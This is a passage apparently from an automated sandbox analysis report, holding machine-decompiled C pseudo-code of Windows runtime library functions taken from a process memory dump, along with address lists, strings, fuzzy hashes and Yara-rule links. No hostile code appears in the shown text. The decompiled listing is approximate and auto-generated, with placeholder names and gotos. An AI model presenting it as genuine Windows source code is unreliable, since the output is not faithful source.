																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0101FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0101FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0101FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0101FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0101FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x10d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x10d7b84 = _t75;
						_t73 = E00FFEB70(_t134, 0x10d7b60);
						if( *0x10d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00FFFF60( *0x10d7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0101fab0
0x0101fab2
0x0101fab3
0x0101fab4
0x0101fabc
0x0101fac0
0x0101fb14
0x0101fb17
0x0101fac2
0x0101fac8
0x0101facd
0x0101fad3
0x0101fad3
0x0101fadd
0x0101fb18
0x0101fb1b
0x0101fb1d
0x0101fb1e
0x0101fb1f
0x0101fb20
0x0101fb21
0x0101fb22
0x0101fb23
0x0101fb24
0x0101fb25
0x0101fb26
0x0101fb27
0x0101fb28
0x0101fb29
0x0101fb2a
0x0101fb2b
0x0101fb2c
0x0101fb2d
0x0101fb2e
0x0101fb2f
0x0101fb3a
0x0101fb3b
0x0101fb3e
0x0101fb41
0x0101fb44
0x0101fb47
0x0101fb4a
0x0101fb4d
0x0101fb53
0x0105bdcb
0x0105bdcb
0x0101fb59
0x0101fb5b
0x0101fb5b
0x0101fb5e
0x0105bdd5
0x0105bdd8
0x00000000
0x0105bdda
0x00000000
0x0105bdda
0x0101fb64
0x0101fb64
0x0101fb64
0x0101fb67
0x0101fb6e
0x0101fb70
0x0101fb72
0x00000000
0x0101fb78
0x0101fb7a
0x0101fb7a
0x0101fb7d
0x0101fb80
0x0105bddf
0x0105bde1
0x00000000
0x0105bde3
0x00000000
0x0105bde3
0x0101fb86
0x0101fb86
0x0101fb86
0x0101fb8b
0x0101fb90
0x0101fb92
0x0101fb94
0x0101fb9a
0x0101fb9b
0x0101fba1
0x0105bde8
0x0105bdeb
0x0105bded
0x0105beb5
0x0105beb5
0x0105bebb
0x0105bebd
0x0105bec3
0x0105bed2
0x0105bedd
0x0105bedd
0x0105beed
0x00000000
0x0105bdf3
0x0105bdfe
0x0105be06
0x0105be0b
0x0105be0d
0x0105be0f
0x0105be14
0x0105be19
0x0105be20
0x0105be25
0x0105be27
0x0105be35
0x0105be39
0x0105be46
0x0105be4f
0x0105be54
0x0105be56
0x0105bef8
0x0105bef8
0x00000000
0x0105be5c
0x0105be5c
0x0105be60
0x00000000
0x0105be66
0x0105be66
0x0105be7f
0x0105be84
0x0105be87
0x0105be89
0x0105be8b
0x0105be99
0x0105be9d
0x0105bea0
0x0105beac
0x0105beaf
0x0105beb1
0x0105beb3
0x0105beb3
0x00000000
0x0105bea2
0x0105bea2
0x00000000
0x0105bea2
0x0105be8d
0x0105be8d
0x0105be92
0x00000000
0x0105be92
0x0105be8b
0x0105be60
0x0105be3b
0x0105be3b
0x0105be3e
0x00000000
0x0105be40
0x0105be40
0x0105be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0105be44
0x0105be3e
0x0105be29
0x0105be29
0x00000000
0x0105be29
0x0105be27
0x00000000
0x0101fba7
0x0101fba7
0x0101fbab
0x0105bf02
0x0101fbb1
0x0101fbb1
0x0101fbb8
0x0101fbbd
0x0101fbbd
0x0101fbbf
0x0101fbbf
0x0101fbc5
0x0101fbcb
0x0101fbf8
0x0101fbf8
0x0101fbfa
0x00000000
0x0101fc00
0x0101fc00
0x0101fc03
0x00000000
0x0101fc09
0x0101fc09
0x0101fc0f
0x0101fc15
0x0101fc23
0x0101fc23
0x0101fc25
0x0101fc27
0x0101fc75
0x0101fc7c
0x0101fc84
0x00000000
0x0101fc29
0x0101fc29
0x0101fc2d
0x0101fc30
0x0105bf0f
0x00000000
0x0101fc36
0x0101fc38
0x0101fc3b
0x0101fc41
0x0105bf17
0x0105bf19
0x0105bf48
0x0105bf4b
0x00000000
0x0105bf1b
0x0105bf22
0x0105bf24
0x0105bf26
0x00000000
0x0105bf2c
0x0105bf37
0x0105bf39
0x0105bf3b
0x00000000
0x0105bf41
0x0105bf41
0x0105bf41
0x0105bf41
0x0105bf45
0x00000000
0x0105bf45
0x0105bf3b
0x0105bf26
0x00000000
0x0101fc47
0x0101fc47
0x0101fc49
0x0101fcb2
0x0101fcb4
0x0101fcb6
0x0101fcdc
0x0101fcdc
0x00000000
0x0101fcb8
0x0101fcc3
0x0101fcc5
0x0101fcc7
0x00000000
0x0101fcc9
0x0101fcc9
0x0101fccd
0x00000000
0x0101fccd
0x0101fcc7
0x00000000
0x0101fc4b
0x0101fc4b
0x0101fc4e
0x0101fc4e
0x0101fc51
0x0101fc51
0x0101fc54
0x0101fc5a
0x0101fc5c
0x0101fc5f
0x0101fc61
0x0101fc63
0x0101fc65
0x0101fc67
0x0101fc6e
0x0101fc72
0x0101fc72
0x0101fc72
0x0101fc72
0x0101fc67
0x0101fc61
0x00000000
0x0101fc5a
0x0101fc49
0x0101fc41
0x0101fc30
0x0101fc27
0x0101fc03
0x0101fbcd
0x0101fbd3
0x0101fbd9
0x0101fbdc
0x0101fbde
0x0101fc99
0x0101fc9b
0x0101fc9d
0x0101fcd5
0x0101fcd5
0x0101fc89
0x0101fc89
0x00000000
0x0101fc9f
0x0101fc9f
0x0101fca3
0x00000000
0x0101fca3
0x00000000
0x0101fbe4
0x0101fbe4
0x0101fbe4
0x0101fbe4
0x0101fbe9
0x0101fbf2
0x00000000
0x0101fbf2
0x0101fbde
0x0101fbcb
0x0101fbab
0x0101fc8b
0x0101fc8b
0x0101fc8c
0x0101fb80
0x0101fb72
0x0101fb5e
0x0101fc8d
0x0101fc91
0x0101fadf
0x0101fadf
0x0101fae1
0x0101fae4
0x0101fae7
0x0101faec
0x0101faf8
0x0101fb00
0x0101fb07
0x0101fb0f
0x0101fb0f
0x0101fb07
0x00000000
0x0101faf8
0x0101fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0105BE0F

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
Instruction ID: e8382970fc5a2d65bfd155e3eb680463d8e8f5685f145ddc1b5ef14940604bb8
Opcode Fuzzy Hash: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
Instruction Fuzzy Hash: 77A1F431B0060A8BEB61DB68C4507BEB7E5BF44714F0445A9EE82CB695DB38E805DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00FE2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x10d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x10d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E010297C0();
				}
				if( *0x10d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x10d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01011624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01007D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0107FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01029520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0101E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0103DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x10d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x10d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01029980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E010295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01007D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01007D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01067016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0107FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x10d5350;
							if(_t109 != 0x10d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0107FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01075720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00fe2d8a
0x00fe2d8a
0x00fe2d92
0x00fe2d96
0x00fe2d9e
0x00fe2da0
0x00fe2da3
0x00fe2da5
0x00fe2da8
0x00fe2dab
0x00fe2db2
0x0103f9aa
0x0103f9ab
0x0103f9ae
0x0103f9ae
0x00fe2db8
0x00fe2dc2
0x0103f9b9
0x0103f9be
0x0103f9bf
0x0103f9bf
0x00fe2dcf
0x0103f9c9
0x00fe2dd5
0x00fe2dd5
0x00fe2dd5
0x00fe2dde
0x00fe2de1
0x00fe2e70
0x00fe2e72
0x00fe2e72
0x00fe2de7
0x00fe2deb
0x00fe2e7c
0x00fe2e83
0x00fe2e85
0x00fe2e8b
0x00fe2e8d
0x00fe2e92
0x00fe2e92
0x00fe2e85
0x00fe2df1
0x00fe2df7
0x00fe2df9
0x00fe2df9
0x00fe2dfc
0x00fe2dff
0x00fe2e02
0x00000000
0x00fe2e05
0x00fe2e0c
0x0103f9d9
0x00fe2e12
0x00fe2e12
0x00fe2e12
0x00fe2e1a
0x0103f9e3
0x0103f9e9
0x0103f9f0
0x0103f9f6
0x0103f9f8
0x0103f9f8
0x0103f9f0
0x00fe2e23
0x0103fa02
0x0103fa03
0x0103fa05
0x0103fa06
0x00000000
0x00fe2e29
0x00fe2e29
0x00fe2e2e
0x00fe2e34
0x00fe2e3e
0x00000000
0x00000000
0x00fe2e44
0x00fe2e47
0x00fe2e4d
0x00000000
0x00000000
0x00fe2e4f
0x00fe2e54
0x00000000
0x00000000
0x00fe2e5a
0x00fe2e5f
0x00fe2e9a
0x00fe2ea4
0x00fe2ea5
0x00fe2ea8
0x00fe2eaf
0x00fe2eb2
0x00fe2eb5
0x0103fae9
0x0103faeb
0x0103faed
0x0103faef
0x0103faf7
0x0103faf8
0x0103fafd
0x0103faff
0x0103fb04
0x0103fb04
0x0103faff
0x00fe2ec0
0x00fe2ec4
0x00fe2ec6
0x00fe2ec8
0x0103fb14
0x0103fb18
0x0103fb1e
0x0103fb21
0x0103fb21
0x00fe2ece
0x00fe2ece
0x00fe2ece
0x00fe2ed7
0x00fe2e61
0x00fe2e63
0x0103fa6b
0x0103fa71
0x0103fa76
0x0103fa78
0x0103fa8a
0x0103fa7a
0x0103fa83
0x0103fa83
0x0103fa8f
0x0103fa91
0x0103fa97
0x0103fa9d
0x0103faa4
0x0103faaa
0x0103faaf
0x0103fab1
0x0103fac3
0x0103fab3
0x0103fabc
0x0103fabc
0x0103fac8
0x0103facb
0x0103fadf
0x0103fadf
0x0103facb
0x0103faa4
0x0103fa91
0x00fe2e6f
0x00fe2e6f
0x00fe2e5f
0x0103fa13
0x0103fa15
0x0103fa17
0x0103fa1f
0x0103fa21
0x0103fa22
0x0103fa25
0x0103fa28
0x0103fa2f
0x0103fa2f
0x0103fa2a
0x0103fa2a
0x0103fa2a
0x0103fa31
0x0103fa34
0x0103fa36
0x0103fa3c
0x0103fa3e
0x0103fa41
0x0103fa43
0x0103fa45
0x0103fa45
0x0103fa41
0x0103fa3c
0x0103fa4a
0x0103fa4f
0x0103fa51
0x0103fa53
0x0103fa56
0x0103fa5b
0x0103fa5e
0x00000000
0x0103fa5e
0x00fe2e23

Strings

RTL: Re-Waiting, xrefs: 0103FA4A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
Instruction ID: 33a3bcffa4be35dd66d0adbbbb7ecde21907ecf3c5952ac853c4377697afbf16
Opcode Fuzzy Hash: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
Instruction Fuzzy Hash: 87615671E00A969FDB72DB69C840BBE77ECEB84324F1402A6D991972C1D7349D019782

Uniqueness

Uniqueness Score: -1.00%

Function 010B0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E010B0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E010AFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E010B1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01029730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E010AA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E010AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x10d8b04 >> 0x14) + (_v44 -  *0x10d8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01007D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E010A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01007D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0109FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x10d8724 & 0x00000008) != 0) {
						E010A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E010B15B5(0x10d8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x010b0eb7
0x010b0eb9
0x010b0ec0
0x010b0ec2
0x010b0ecd
0x010b105b
0x010b105b
0x010b1061
0x010b1066
0x010b1066
0x010b106b
0x010b1073
0x010b1073
0x010b0ed3
0x010b0ed6
0x010b0edc
0x010b0ee0
0x010b0ee7
0x010b0ef0
0x010b0ef5
0x010b0efa
0x010b0efc
0x010b0efd
0x010b0f03
0x010b0f04
0x010b0f06
0x010b0f07
0x010b0f09
0x010b0f0e
0x010b0f14
0x010b0f23
0x010b0f2d
0x010b0f34
0x010b0f34
0x010b0f14
0x010b0f52
0x00000000
0x00000000
0x010b0f58
0x010b0f73
0x010b0f74
0x010b0f79
0x010b0f7d
0x010b0f80
0x010b0f86
0x010b0fab
0x010b0fb5
0x010b0fc6
0x010b0fd1
0x010b0fe3
0x010b0fd3
0x010b0fdc
0x010b0fdc
0x010b0feb
0x010b1009
0x010b1009
0x010b1015
0x010b1027
0x010b1017
0x010b1020
0x010b1020
0x010b102f
0x010b103c
0x010b103c
0x010b1048
0x010b1050
0x010b1050
0x010b1055
0x00000000
0x010b1055
0x010b0f88
0x010b0f9e
0x010b0fa2
0x010b0fa9
0x00000000
0x00000000
0x00000000
0x010b0fa9
0x00000000

Strings

`, xrefs: 010B0F16

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
Instruction ID: af6782fd764b6ebd0c37c1b4aad757565a746bdfba7fd8dbad8f360d486e4db5
Opcode Fuzzy Hash: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
Instruction Fuzzy Hash: B5519A713043829BE325DF28E8D4B9BBBE5EB84704F04096DFAC687690D771E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0101F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0101F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01004120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01029830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01029990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E010295D0();
							goto L11;
						} else {
							_t109 = L01004620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0102F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E010295D0();
										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0101f0d3
0x0101f0d9
0x0101f0e0
0x0101f0e7
0x0101f0f2
0x0101f0f4
0x0101f0f8
0x0101f100
0x0101f108
0x0101f10d
0x0101f115
0x0101f116
0x0101f11f
0x0101f123
0x0101f124
0x0101f12c
0x0101f130
0x0101f134
0x0101f13d
0x0101f144
0x0101f14b
0x0101f152
0x0105bab0
0x0105bab0
0x0101f158
0x0101f158
0x0101f15a
0x0101f160
0x0101f165
0x0101f166
0x0101f16f
0x0101f173
0x0105baa7
0x0105baa7
0x0105baab
0x00000000
0x0101f179
0x0101f18d
0x0101f191
0x0105baa2
0x00000000
0x0101f197
0x0101f19b
0x0101f1a2
0x0101f1a9
0x0101f1af
0x0101f1b2
0x0101f1b6
0x0101f1b9
0x0101f1c4
0x0101f1d8
0x0101f1df
0x0101f1e3
0x0101f1eb
0x0101f1ee
0x0101f1f4
0x0101f20f
0x0105bab7
0x0105babb
0x0105bacc
0x0105bad1
0x0101f215
0x0101f218
0x0101f226
0x0101f22b
0x00000000
0x0101f22b
0x0101f1f6
0x0101f1f6
0x0101f1f9
0x0101f1fb
0x0101f1fb
0x0101f1f4
0x0101f191
0x0101f173
0x0101f152
0x0101f203

Strings

@, xrefs: 0101F124

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 8fdc252dfe0d6c5d905de37420e6de76e9be9535c9558e5b9a07d9786e5ff2c5
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 85518F716047119FD321DF29C840AABBBF9FF48750F00892DFA9597690E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01063540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01063540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x10dd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
